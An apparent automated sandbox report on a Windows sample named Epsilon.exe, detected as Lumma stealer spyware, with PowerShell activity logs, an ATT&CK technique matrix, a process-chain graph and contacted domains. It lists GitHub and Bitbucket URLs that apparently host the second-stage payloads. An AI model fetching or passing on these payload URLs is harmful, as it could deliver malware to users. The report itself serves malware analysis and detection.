        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737828964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF737828964
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737822C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF737822C54
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information111
        Scripting        		Valid Accounts2
        Command and Scripting Interpreter        		111
        Scripting        		1
        Access Token Manipulation        		21
        Virtualization/Sandbox Evasion        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		21
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts12
        Native API        		1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        Access Token Manipulation        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook1
        DLL Side-Loading        		1
        Obfuscated Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Timestomp        		Cached Domain Credentials16
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582590 Sample: Epsilon.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 31 raw.githubusercontent.com 2->31 33 bitbucket.org 2->33 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 11 other signatures 2->45 10 Epsilon.exe 1 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\677174b841ee7.vbs, ASCII 10->29 dropped 13 cmd.exe 3 2 10->13         started        process6 process7 15 wscript.exe 1 13->15         started        18 conhost.exe 13->18         started        signatures8 53 Suspicious powershell command line found 15->53 55 Wscript starts Powershell (via cmd or directly) 15->55 57 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->57 59 Suspicious execution chain found 15->59 20 powershell.exe 7 15->20         started        process9 signatures10 47 Suspicious powershell command line found 20->47 49 Found suspicious powershell code related to unpacking or dynamic code loading 20->49 23 powershell.exe 14 23 20->23         started        27 conhost.exe 20->27         started        process11 dnsIp12 35 raw.githubusercontent.com 185.199.111.133, 443, 49704 FASTLYUS Netherlands 23->35 37 bitbucket.org 185.166.143.48, 443, 49705 AMAZON-02US Germany 23->37 51 Loading BitLocker PowerShell Module 23->51 signatures13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Epsilon.exe37%ReversingLabsWin64.Spyware.Lummastealer

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bitbucket.org
        		185.166.143.48
        		truefalse
          		high
          raw.githubusercontent.com
          		185.199.111.133
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpgfalse
              		high
              https://bitbucket.org/rterterq/fwqfqweqwr/downloads/opkSkch.txtfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://id.atlassian.com/loginpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://id.atlassian.com/logoutpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://admin.atlassian.compowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611powershell.exe, 00000005.00000002.2430048549.0000027B3A3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2466653987.0000027B523E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170048890.000001A1DA670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168503153.000001A1DA419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA3B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170230937.000001A1DA684000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.bitbucket.orgpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/jsi18n/en/djpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://preferences.atlassian.compowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://id.atlassian.com/manage-profile/powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.atlassian.com/try/cloud/signup?bundle=bitbucketpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://raw.githubusercontent.compowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bitbucket.status.atlassian.com/powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.cookielaw.org/powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
